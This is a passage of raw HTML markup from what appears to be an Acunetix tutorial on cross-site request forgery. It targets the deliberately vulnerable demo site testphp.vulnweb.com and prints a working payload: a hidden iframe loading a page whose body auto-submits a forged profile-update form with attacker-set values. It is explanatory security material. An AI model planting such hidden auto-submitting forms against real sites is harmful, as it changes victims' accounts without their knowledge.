&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;type&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;text&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;value&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;1254-5498-5233-5569&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;strong style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; font-weight: normal; outline: 0px !important;&quot;&gt;&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;ucc&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;style&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;width:200px&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;type&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;text&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;value&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;example@vulnweb.com&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;strong style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; font-weight: normal; outline: 0px !important;&quot;&gt;&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;uemail&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;style&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;width:200px&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;type&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;text&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;value&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;+44 123 12345 123&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;strong style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; font-weight: normal; outline: 0px !important;&quot;&gt;&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;uphone&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;style&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;width:200px&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;textarea&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;wrap&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;soft&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;strong style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; font-weight: normal; outline: 0px !important;&quot;&gt;&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;uaddress&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;rows&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;5&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;style&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;width:200px&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;
North London, London, England&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;textarea&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
When the user clicks the ‘Update’ button of the form userinfo.php, an HTTP POST request will be sent that will contain the above parameters along with their values accordingly.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
Since the website does not have any prevention measures against CSRF, the attacker can use this form (http://testphp.vulnweb.com/userinfo.php) to submit any desired information without the user’s consent. The attacker will perform this by embedding the actual code of the update form in his own website and when the victim visits the attacker’s website, the form, including any desired information of the attacker, will be submitted to the target website.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
This is the malicious website of the attacker.&lt;br style=&quot;box-sizing: border-box; outline: 0px !important;&quot; /&gt;&lt;img alt=&quot;Example victim of CSRF attack&quot; class=&quot;aligncenter size-full wp-image-8861&quot; height=&quot;321&quot; src=&quot;http://www.acunetix.com/wp-content/uploads/2013/04/acx1.jpg&quot; style=&quot;border-radius: 4px; border: 0px; box-sizing: border-box; display: block; height: auto; margin: 0px auto; max-width: 100%; outline: 0px !important; vertical-align: middle;&quot; title=&quot;CSRF&quot; width=&quot;416&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
The attacker’s website is a normal online photo gallery website. However, it contains a hidden form which will auto submit and update the victim’s profile on testphp.vulnweb.com.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
The hidden&amp;nbsp;&lt;code style=&quot;background-color: #f9f2f4; border-radius: 4px; box-sizing: border-box; color: #c7254e; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 12.6px; outline: 0px !important; padding: 2px 4px;&quot;&gt;iframe&lt;/code&gt;&amp;nbsp;exists in the&amp;nbsp;&lt;kbd style=&quot;background-color: #e7e7e7; border-radius: 3px; box-shadow: rgba(0, 0, 0, 0.247059) 0px -1px 0px inset; box-sizing: border-box; color: #4d4d4d; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 12.6px; outline: 0px !important; padding: 2px 4px;&quot;&gt;myimages.php page&lt;/kbd&gt;.&lt;/div&gt;
&lt;pre style=&quot;background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; outline: 0px !important; overflow: auto; padding: 9.5px; word-break: break-all; word-wrap: break-word;&quot;&gt;&lt;code class=&quot; hljs xml&quot; style=&quot;background: rgb(248, 248, 248); border-radius: 0px; box-sizing: border-box; display: block; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: inherit; outline: 0px !important; overflow-x: auto; padding: 0.5em; white-space: pre-wrap;&quot;&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;iframe&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;src&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;http://www.vulnweb.com/updateif.php&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;style&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;display:none&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;iframe&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
This loads another page of the attacker’s website. The website contains the actual&amp;nbsp;&lt;kbd style=&quot;background-color: #e7e7e7; border-radius: 3px; box-shadow: rgba(0, 0, 0, 0.247059) 0px -1px 0px inset; box-sizing: border-box; color: #4d4d4d; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 12.6px; outline: 0px !important; padding: 2px 4px;&quot;&gt;userinfo.php&lt;/kbd&gt;&amp;nbsp;page code which auto submits and updates the particular&amp;nbsp;&lt;kbd style=&quot;background-color: #e7e7e7; border-radius: 3px; box-shadow: rgba(0, 0, 0, 0.247059) 0px -1px 0px inset; box-sizing: border-box; color: #4d4d4d; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 12.6px; outline: 0px !important; padding: 2px 4px;&quot;&gt;userinfo.php&lt;/kbd&gt;&amp;nbsp;of the current victim. This happens automatically every time a user accesses this website.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
The&amp;nbsp;&lt;kbd style=&quot;background-color: #e7e7e7; border-radius: 3px; box-shadow: rgba(0, 0, 0, 0.247059) 0px -1px 0px inset; box-sizing: border-box; color: #4d4d4d; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 12.6px; outline: 0px !important; padding: 2px 4px;&quot;&gt;updateif.php&lt;/kbd&gt;&amp;nbsp;page contains the actual form code which auto submits the desired information the attacker has set.&lt;/div&gt;
&lt;pre style=&quot;background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; outline: 0px !important; overflow: auto; padding: 9.5px; word-break: break-all; word-wrap: break-word;&quot;&gt;&lt;code class=&quot; hljs xml&quot; style=&quot;background: rgb(248, 248, 248); border-radius: 0px; box-sizing: border-box; display: block; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: inherit; outline: 0px !important; overflow-x: auto; padding: 0.5em; white-space: pre-wrap;&quot;&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;body&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;onload&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;document.getElementById(&#39;f&#39;).submit()&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;form&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;id&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;f&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;action&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;http://testphp.vulnweb.com/userinfo.php&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;method&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;post&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;form1&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;urname&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;value&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;attacker’svalue&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;ucc&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;value&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot; attacker’svalue&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;uemail&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;value&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot; attacker’svalue&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;uphone&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;value&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot; attacker’svalue&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;textarea&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;uaddress&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;wrap&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;soft&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;attacker’svalue&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;textarea&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;update&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;value&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;update&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;form&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;body&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
This form retrieves the value information from a text file. When the updateif.php is called, the information (set earlier) by the attacker is retrieved and placed in the&amp;nbsp;&lt;code style=&quot;background-color: #f9f2f4; border-radius: 4px; box-sizing: border-box; color: #c7254e; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 12.6px; outline: 0px !important; padding: 2px 4px;&quot;&gt;value&lt;/code&gt;&amp;nbsp;fields. Then the form is auto submitted and the target page is loaded. These operations are performed inside a hidden iframe, thus the victim will not see the target website.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
The attacker has an admin page – www.vulnweb.com/hackpanel – from where values values to be submitted on the target website can be set.&lt;br style=&quot;box-sizing: border-box; outline: 0px !important;&quot; /&gt;&lt;img alt=&quot;Example victim of CSRF attack&quot; class=&quot;aligncenter size-full wp-image-8862&quot; height=&quot;459&quot; src=&quot;http://www.acunetix.com/wp-content/uploads/2013/04/acx2.jpg&quot; style=&quot;border-radius: 4px; border: 0px; box-sizing: border-box; display: block; height: auto; margin: 0px auto; max-width: 100%; outline: 0px !important; vertical-align: middle;&quot; title=&quot;CSRF&quot; width=&quot;361&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
The admin hack panel is a control page where the attacker can set the information that will be submitted to the target website when the CSRF attack is realized.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
From this website, the attacker can set new information. (Note: For the purposes of this example, there is a reset button which will reset the values of the target website) This information is stored in a file, from which the updateif.php (seen earlier) will load and submit the attacker’s value.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
So, as we mentioned earlier, in order for the attacker to perform a CSRF attack and his information to be submitted, the main requirement is for the victim to be logged into the target website. When the victim visits the attackers’ website, the hidden iframe will load the code of the update profile form found in the userinfo.php (target’s update profile form) with the attacker’s desired information and auto submit them to the target website. This operation is the exact operation the victim could perform to update his profile. However, due to the CSRF vulnerability a third party entity such as an attacker can use this operation to submit malicious information without the user being able to know about it.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
The attacker sets the desired information in the http://www.vulnweb.com/hackpanel/ page and clicks ‘Update’. The information is stored in the file.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
&lt;img alt=&quot;Example victim of CSRF attack&quot; class=&quot;aligncenter size-full wp-image-8863&quot; height=&quot;460&quot; src=&quot;http://www.acunetix.com/wp-content/uploads/2013/04/acx3.jpg&quot; style=&quot;border-radius: 4px; border: 0px; box-sizing: border-box; display: block; height: auto; margin: 0px auto; max-width: 100%; outline: 0px !important; vertical-align: middle;&quot; title=&quot;CSRF&quot; width=&quot;361&quot; /&gt;&lt;br style=&quot;box-sizing: border-box; outline: 0px !important;&quot; /&gt;The attacker’s information is ready to be loaded when the attacker’s website is visited.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
When the victim visits the attacker’s website at&amp;nbsp;&lt;a href=&quot;http://www.vulnweb.com/index.php&quot; style=&quot;background: transparent; box-sizing: border-box; color: #e31e25; outline: 0px !important; text-decoration: none; transition: all 0.2s ease-in;&quot;&gt;www.vulnweb.com/index.php&lt;/a&gt;, nothing will happen since there is not any malicious code in the ‘Home’ page. The victim needs to access the&amp;nbsp;&lt;a href=&quot;http://www.vulnweb.com/myimages.php&quot; style=&quot;background: transparent; box-sizing: border-box; color: #e31e25; outline: 0px !important; text-decoration: none; transition: all 0.2s ease-in;&quot;&gt;www.vulnweb.com/myimages.php&lt;/a&gt;&amp;nbsp;page where the malicious code exists, and the attacker’s information will be submitted to the target website (testphp.vulnweb.com/).&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
